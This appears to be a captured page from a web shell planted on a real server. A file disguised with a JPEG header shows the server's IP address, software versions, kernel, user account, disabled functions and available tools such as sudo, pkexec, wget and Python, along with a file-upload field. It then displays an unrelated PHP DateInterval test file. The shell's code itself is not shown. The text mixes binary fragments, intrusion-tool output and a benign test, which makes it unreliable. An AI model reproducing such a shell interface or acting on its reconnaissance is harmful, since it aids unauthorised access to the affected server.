????JFIF??x?x????'
Server IP : 79.136.114.73 / Your IP : 216.73.216.238 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /proc/self/root/home/b8009/php-5.6.22/ext/date/tests/ |
Upload File : |
--TEST-- DateInterval::format(), except %a --DESCRIPTION-- %a is covered in a separate test. Don't want an XFAIL here to cause confusion if a real bug comes up. --CREDITS-- Daniel Convissor <danielc@php.net> # TestFest 2010 BKTK --SKIPIF-- <?php if (!method_exists('DateInterval', 'format')) die("skip: method doesn't exist"); ?> --FILE-- <?php date_default_timezone_set('UTC'); $date1 = new DateTime('2000-01-01 00:00:00'); $date2 = new DateTime('2001-03-04 04:05:06'); $interval = $date1->diff($date2); echo $interval->format('Y=%Y') . "\n"; echo $interval->format('M=%M') . "\n"; echo $interval->format('D=%D') . "\n"; echo $interval->format('H=%H') . "\n"; echo $interval->format('I=%I') . "\n"; echo $interval->format('S=%S') . "\n"; echo $interval->format('R=%R') . "\n"; echo $interval->format('y=%y') . "\n"; echo $interval->format('m=%m') . "\n"; echo $interval->format('d=%d') . "\n"; echo $interval->format('h=%h') . "\n"; echo $interval->format('i=%i') . "\n"; echo $interval->format('s=%s') . "\n"; echo $interval->format('r=%r') . "\n"; echo "\n"; $interval = $date2->diff($date1); echo $interval->format('inverted R=%R') . "\n"; echo $interval->format('inverted r=%r') . "\n"; echo "\n"; echo $interval->format('%=%%') . "\n"; // Invalid valid format character does not raise warnings. echo $interval->format('x=%x') . "\n"; ?> --EXPECT-- Y=01 M=02 D=03 H=04 I=05 S=06 R=+ y=1 m=2 d=3 h=4 i=5 s=6 r= inverted R=- inverted r=- %=% x=%x